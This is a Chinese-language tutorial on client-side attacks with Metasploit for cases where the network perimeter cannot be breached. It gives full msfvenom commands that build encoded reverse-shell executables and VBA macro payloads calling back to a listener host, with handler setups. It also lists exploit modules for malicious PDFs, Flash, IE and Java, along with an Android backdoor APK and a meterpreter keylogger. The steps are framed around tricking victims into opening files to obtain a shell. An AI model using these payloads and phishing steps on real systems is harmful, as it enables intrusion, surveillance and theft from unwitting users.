Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
在无法突破网络边界的情况下转而攻击客户端有一些思路,如:
1、社会工程学攻击
2、进而渗透线上业务网络
3、透过含有漏洞利用代码的WEB站点,即:利用客户端漏洞
4、含有漏洞利用代码的DOC、PDF等文档
5、诱骗被害者执行Payload
思路举例:
诱骗被害者执行Payload,先生成可执行程序:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
将可执行程序发送到客户端等待客户端运行,同时本地msf侦听开启:
msfconsole -q
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
含有漏洞利用代码的DOC、PDF等文档,举例:
(PDF阅读器利用下面的客户端程序的漏洞实现攻击)
利用Acrobat Reader漏洞执行Payload
首先构造PDF文件:
exploit/windows/fileformat/adobe_utilprintf
set payload meterpreter/reverse_tcp
set lhost
set lport
run
被攻击者的电脑的阅读器如果存在漏洞,那么将被执行成功取得shell。
扩展:当取得meterpreter后,可以执行例如以下命令对目标的控制:
use priv
run post/windows/capture/keylog_recorder (知道对方正在敲击的键盘)
利用Flash插件漏洞执行payload(要对应相同的版本)
扫描二维码关注公众号,回复:
9128519 查看本文章
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution
利用JRE漏洞执行payload
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
生成Android后门程序
use payload/android/meterpreter/reverse_tcp
generate -f a.apk -p android -t raw
VBScript感染方式:
利用宏感染word、Excel文档,从而绕过某些基于文件类型检查的安全机制
先生成VBScript脚本:
msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
再在文档中添加生成的payload:
:视图---->宏---->创建
payload第一部分粘入VBA代码;
payload第二部分(data)粘入word文档正文;
最后Msf启动侦听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
只要被攻击者点击文档,那么就能够取得shell。